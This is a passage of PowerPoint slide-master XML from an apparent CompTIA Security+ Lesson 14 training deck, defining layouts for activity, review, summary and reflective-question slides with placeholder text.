              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A4D6FD-54DB-4A85-9C3A-6A0AD67AE608}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F596223D-E28C-4DE3-8688-E8474B72A70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7045658" y="3391133"/>
            <a:ext cx="1768897" cy="1100033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E662A3-41EF-4757-9E50-3874C3C5EA2C}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3198385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ds-On Activity No Placeholder">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15C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>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9" name="Rectangle: Single Corner Rounded 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9201DA1E-285E-4174-99B5-67C7A0E0BEEE}"/>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4" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E8E379-9528-47D0-BE38-B1667C9AAF6A}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC9EA13-55DB-42AE-B91D-543097E36560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2688609" y="1912735"/>
            <a:ext cx="3766782" cy="2711800"/>
            <a:chOff x="5985300" y="2769916"/>
            <a:chExt cx="3766782" cy="2711800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB529D43-EEA1-473A-BC3C-E51526258A4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5985300" y="2769916"/>
              <a:ext cx="3766782" cy="2342468"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE81FDD-B8E6-4F10-9A0B-7F7DC7F0A870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6136276" y="5112384"/>
              <a:ext cx="3615806" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Performance Based Question</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2337764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inds-On Activity">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15C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>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11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D55877A-36DD-4C5F-9261-0D426EBA0161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1514902"/>
            <a:ext cx="6659379" cy="3167002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E665D4A-FB50-4508-ACE5-2945A34F4345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7001303" y="3574771"/>
            <a:ext cx="1857606" cy="1261786"/>
            <a:chOff x="7001303" y="3574771"/>
            <a:chExt cx="1857606" cy="1261786"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B880B59-FC96-477E-AC99-8876E161C9DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7001303" y="4467225"/>
              <a:ext cx="1857606" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Review Activity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3E252C-D736-4920-BB1B-1216044AAE14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7123910" y="3574771"/>
              <a:ext cx="1612392" cy="883222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Single Corner Rounded 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F09CB82B-7DA3-44C1-858D-A783D973D756}"/>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5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528EE9A7-6869-43EB-B3EB-B87835E22100}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241009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inds-On Activity No Placeholder">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15C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6C6110-E32B-4D07-BF47-7EA06CAF42DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2657124" y="2157377"/>
            <a:ext cx="3829752" cy="2467158"/>
            <a:chOff x="2657124" y="2157377"/>
            <a:chExt cx="3829752" cy="2467158"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B880B59-FC96-477E-AC99-8876E161C9DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3718685" y="4255203"/>
              <a:ext cx="1857606" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Review Activity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DD35B9-236A-48FB-B81D-ABE61ABF61AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657124" y="2157377"/>
              <a:ext cx="3829752" cy="2097826"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle: Single Corner Rounded 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FC97FC-6077-4324-B6E8-1B34BAA4F872}"/>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3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3C3FA5-F228-402B-ACE9-FA3417311D68}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2400902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Summary">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id="{52AC8521-3410-4C4A-B7A5-D78B8E51BD90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="408561" y="331611"/>
            <a:ext cx="8326878" cy="2889261"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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19" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{261C2E7D-BB67-4F0C-87F1-756FC1974276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>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dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6DF4C4-B555-4514-B737-CAA82E353FFE}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064525" y="4869623"/>
            <a:ext cx="5274860" cy="274637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510239CA-8F80-4A08-B566-F2EB5C02D6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447760" y="3741031"/>
            <a:ext cx="2696240" cy="1402469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239C023D-BE38-44E3-B6B2-E185DAF0A46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447760" y="3741031"/>
            <a:ext cx="2696240" cy="1402469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111725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eflective Question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15C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064525" y="4869623"/>
            <a:ext cx="5274860" cy="274637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510239CA-8F80-4A08-B566-F2EB5C02D6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447760" y="3741031"/>
            <a:ext cx="2696240" cy="1402469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239C023D-BE38-44E3-B6B2-E185DAF0A46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447760" y="3741031"/>
            <a:ext cx="2696240" cy="1402469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ACF2AC2-6898-4F8D-9D90-9F13C8AD3198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflective Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B957B6C0-2ED7-4A79-B391-3F58EA10CD8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980348"/>
            <a:ext cx="8455567" cy="3045552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1298883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104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378064"/>
            <a:ext cx="5486400" cy="2827640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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792288" y="3685526"/>
            <a:ext cx="5486400" cy="603647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx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id="{6AD6516E-B928-442D-ABD3-DAE814C7C00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2DB78B-FA03-48BE-86D0-D938EC525CE3}"/>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12" name="Slide Number Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CC36B0D-83AB-4E08-B7A5-9029E6FC39D6}"/>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3" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE546AB-EF65-497F-9200-0147629FB370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792289" y="3190897"/>
            <a:ext cx="5486400" cy="494629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000"/>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3804A91A-CE86-4890-BC3D-060B8E55C733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33814815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dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863308DA-D7BC-384E-821F-8A3A2D1C8CE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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FC80A7-8E0B-4AAC-882B-47FB6EB1A18A}"/>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8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
